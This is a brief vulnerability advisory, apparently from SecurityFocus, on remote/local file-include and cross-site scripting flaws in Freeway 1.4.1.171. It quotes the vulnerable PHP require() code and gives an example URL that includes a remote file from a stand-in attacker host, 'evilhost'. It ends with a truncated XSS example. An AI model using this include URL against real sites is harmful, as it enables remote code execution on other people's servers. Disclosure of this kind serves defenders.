source: https://www.securityfocus.com/bid/30676/info Freeway is prone to multiple remote file-include and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. Freeway 1.4.1.171 is affected; other versions may also be vulnerable. 1. Multiple Remote/Local File Include Example: ... $command=isset($HTTP_GET_VARS['command'])?$HTTP_GET_VARS['command']:''; ... if($command!="") { switch($command){ ... case 'include_page': require($HTTP_GET_VARS['include_page']); break; ... http://www.example.com/[installdir]/admin/create_order_new.php=http://evilhost/info.php Local File Include vulnerability found in script includes/events_application_top.php 2. Linked XSS vulnerability Example http://www.example.com/[installdir]/admin/search_links.php"